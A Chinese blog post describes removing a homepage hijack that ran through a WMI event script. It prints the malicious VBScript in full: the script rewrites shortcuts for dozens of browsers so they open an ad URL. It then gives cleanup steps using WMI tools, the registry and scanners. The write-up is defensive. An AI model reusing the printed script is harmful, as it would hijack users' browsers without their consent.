主页被篡改2345,hao123根治

前段时间主页被篡改,而且电脑还中了其他不同种类的病毒,已经全面覆盖默认的User+admin权限用户,开机闪屏+自动结束打开任务等等,当时直接注销用户,采用系统保留用户administrater用户登录,然后安装360,重新全盘扫描,但是对于一个安全新手来说,360清理掉了许多可以正常使用的工具,而且许多工具功能也变的残缺,只好重装系统。
昨天电脑在此打开了某客的工具包,电脑直接被恶作剧,不过目前没发现什么大碍,重启后主页被篡改,又不想使用360,只好手动清理。

首先,我中的浏览器
Chrom
firefox

主页被劫持的原理其实就是通过WMI自动运行的脚本,WMI是windows后台运行的事件管理器。

更改WMI就需要下载
https://arlenluo.github.io./images/post6/WMITools.exe
image.png

然后直接点击okok


image.png

然后右键查看这个的属性


image.png

这里就是幕后黑手
里面的代码
On Error Resume Next
Const link = "http://hao934.com/?r=gameall&m=a286"
Const link360 = "http://hao934.com/?r=gameall&m=a286&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\Username\Desktop,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\Username\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next  

lnkpathsArr = split(lnkpaths,",")  
Set oFolders = CreateObject("scripting.dictionary")  

For Each lnkpath In lnkpathsArr  
    oFolders.Add lnkpath, lnkpath  
Next  

Set fso = CreateObject("Scripting.Filesystemobject")  
Set WshShell = CreateObject("Wscript.Shell")  
For Each oFolder In oFolders  
    If fso.FolderExists(oFolder) Then  
        For Each file In fso.GetFolder(oFolder).Files  
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then  
                Set oShellLink = WshShell.CreateShortcut(file.Path)  
                path = oShellLink.TargetPath  
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)  
                If oDic.Exists(LCase(name)) Then  
                    If LCase(name) = LCase("360se.exe") Then  
                        oDicShellLink.Arguments = link360  
                    Else  
                        oShellLink.Arguments = link  
                    End If  
                    If file.Attributes And 1 Then  
                        fsoile.Attributes = file.Attributes - 1  
                    End If  
                    oShellLink.Save  
                End If  
            End If  
        Next  
    End If  
Next

现在篡改主页的代码大致都是这样。理解起来没什么代难度,不过这个代码写的灰常好,还对360做了特殊处理。

image.png

而且不能直接删除。
需要CD到WMI的安装目录管理员运行wbemeventviewer.exe
然后需要将桌面和开始菜单,快速启动栏中的快捷方式删除

我的桌面和快速启动栏没东西
开始菜单目录
C:\ProgramData\Microsoft\Windows\Start Menu\Programs
image.png

把后面这个去了,应该大部分篡改网页的脚本小子的方式都能去掉。

不过我这边修改完以后界面又跳转到了

http://www.2345.com/?36457

继续踩坑
在注册表中的

HKEY_CLASSES_ROOT/CLSID /{871C5380-42A0-1069-A2EA-08002B30309D}/shell/OpenHomePage/Command

查看病毒没有更改注册表,(如果有的话双击数据,将后面的链接删掉),当然我这边不是这种情况。

另外一种就是木马了,懒得找,直接使用adwcleaner程序进行清理。

如果清理结束后重新启动后主页仍然是2345,说明肯定是木马了,而且十分有可能是伪装型木马,就算肉眼找到也不会去怀疑的,直接使用现在的杀毒软件就好。
我使用的是360大法宝,当然杀毒软件这个东西杀完毒就卸载,直接采用其中的系统急救箱,强力模式,自定义扫描,清除系统关键位置(C盘),关系的东西记得备份。
有linux子系统和其他安全工具的记得转移

linux子系统目录
C:\Users\{user namae}\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu16.04onWindows_79rhkp1fndgsc\LocalState\rootfs

至此,主流的主页篡改就这些。
当然嫌弃麻烦的可以直接用360的主页防护+系统急救箱

推荐阅读更多精彩内容

  • 本文全是干货,全是思维,全是自己的整理总结;通过现象看本质,带着俯视的角度跳出来看产品,并附有做产品的一些方法;以...
    干货_绍琰阅读 1,269评论 0 27
  • 上周日去小提琴课的路上,提出买酸奶的,我说可以给赵老师带一杯,他说好,想了一下说不行,赵老师都胖了。继续补充,有一...
    宣萍阅读 69评论 0 0
  • 姐姐,今夜我在德令哈,夜色笼罩 姐姐,今夜我只有戈壁 草原尽头我两手空空 悲痛时握不住一颗泪滴 姐姐,今夜我在德令...
    醒糊涂人阅读 23评论 0 0
  • 所谓内脏脂肪,是指内脏周围的脂肪组织细胞,简单讲就是肚子越大,内脏脂肪就越高,它给你带来的不是不美观是不健康。我的...
    乐纤减脂教练阅读 434评论 0 0